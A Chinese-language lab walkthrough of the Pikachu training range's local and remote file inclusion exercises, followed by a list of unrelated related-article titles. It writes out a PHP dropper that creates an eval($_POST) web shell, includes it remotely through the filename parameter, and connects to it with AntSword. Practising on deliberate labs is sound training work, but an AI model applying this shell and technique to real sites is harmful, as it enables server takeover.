当前位置: 首页 > news >正文

pikachu文件包含漏洞靶场

news 2025/7/7 15:53:07

本地文件包含

1、先随意进行提交

可以得出是GET传参 可以在filename参数进行文件包含

2、准备一个2.jpg文件

内容为<?php phpinfo();?>

3、上传2.jpg文件

4、访问文件保存的路径uploads/2.jpg

5、将我们上传的文件包含进来 使用../返回上级目录 来进行包含木马文件

发现文件已被包含

远程文件包含

1、在云主机上生成一个1.txt文件

<?php fputs(fopen("L.php","w"),'<?php eval($_POST["cmd"]);?>')?>

2、打开pikachu的远程文件包含,随便提交查询一个

可以看到get接受一个filename参数

3、将文件远程包含在filename处修改为云服务器的目标地址

4、查看fileinclude目录是否生成php文件

5、访问生成的L.php文件

6、使用蚁剑进行连接

http://www.lryc.cn/news/431913.html

相关文章:

  • 基于DPU与SmartNIC的K8s Service解决方案
  • SLM561A​​系列 60V 10mA到50mA线性恒流LED驱动芯片 为智能家居照明注入新活力
  • Requests库对session的支持
  • 利用深度学习实现验证码识别-2-使用Python导出ONNX模型并在Java中调用实现验证码识别
  • 如何通过Spring Cloud Consul增强微服务安全性和可靠性
  • 无代码搭建小程序zion
  • 【南方科技大学】CS315 Computer Security 【Lab1 Packet Sniffing and Wireshark】
  • 【人工智能/机器学习/机器人】数学基础-学习笔记
  • 视频安防监控LntonAIServer安防管理平台抖动检测和过亮过暗检测
  • 网络模型及协议介绍
  • 手撕HashMap源码
  • OceanBase block_file与log过大 的问题
  • 【Focal Loss 本质】
  • 端口安全老化细节
  • 【C++】—— string 模拟实现
  • 详解TensorRT的C++高性能部署以及C++部署Yolo实践
  • 手机如何切换网络IP地址:‌方法详解与操作指南‌
  • 南通网站建设手机版网页
  • macos系统内置php文件列表 系统自带php卸载方法
  • 微信小程序认证和备案
  • C++复习day05
  • python数值误差
  • 基于FPGA的OV5640摄像头图像采集
  • CDN ❀ Http协议标准缓存字段梳理
  • 浅谈NODE的NPM命令和合约测试开发工具HARDHAT
  • k8s-pod 实战六 (如何在不同的部署环境中调整startupprobe的参数?)
  • 和服务端系统的通信
  • python 实现perfect square完全平方数算法
  • 【漏洞复现】某客圈子社区小程序审计(0day)
  • 信息安全数学基础(1)整除的概念